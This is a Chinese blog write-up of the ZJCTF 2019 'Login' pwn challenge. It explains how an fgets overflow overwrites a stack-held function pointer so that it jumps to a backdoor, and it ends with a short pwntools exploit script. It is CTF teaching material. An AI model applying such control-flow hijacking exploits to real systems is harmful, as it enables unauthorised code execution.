BUU [ZJCTF 2019]Login

这是一道让我感觉很淦的题,整一天了才大致了解了来龙去脉

开始:

首先丢到虚拟机checksec一下看看有啥保护措施:

看到开了Canary,就已经感觉不妙了,接着丢到IDA里看看啥情况
 一看,是令人痛苦的c++风格的代码,加上奇奇怪怪的各种作用域,已经很懵逼了

这里发现了存在一个后门函数。 

不过找了一圈了,除了发现用了fgets函数存在栈溢出的情况,也没其他漏洞了,而且有canary保护,也根本不知道如何泄露出canary。

于是去网上找了一下wp,发现有一种从没用过的牛逼招式,就是改函数调用。

在password_checker这个函数中,传入了一个指针进去,并且调用了这个指针,而调用这个参数指针,是从栈上的数据传进去的,由此我们推测也许可以更改函数的地址,使程序跳转到后门函数执行拿到shell。

我们反汇编一下password_checker看看
 果然调用了rax这个寄存器的内容,那么我们就可以往回追杀,看看这个rax究竟来自于哪里,看看fget函数能不能覆盖到。

 

 

 

 

 

 (直接偷图了)

经过一系列溯源之后,我们可以看到最终call rax的rax来自var_18的位置
(这里要特别说明一下lea指令,它是把栈的地址给寄存器,而有别于mov,如果是mov,中括号里的地址会被索引成对应的内容赋值给寄存器)

所以我们要想办法把var_18改成backdoor的地址即可。

下面是exp:
 

from pwn import *
 
r = remote()
 
backdoor = 0x400e88
r.sendlineafter(': ','admin')
r.sendlineafter(': ','2jctf_pa5sw0rd'+'\x00'*0x3a+p64(backdoor))
 
r.interactive()

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值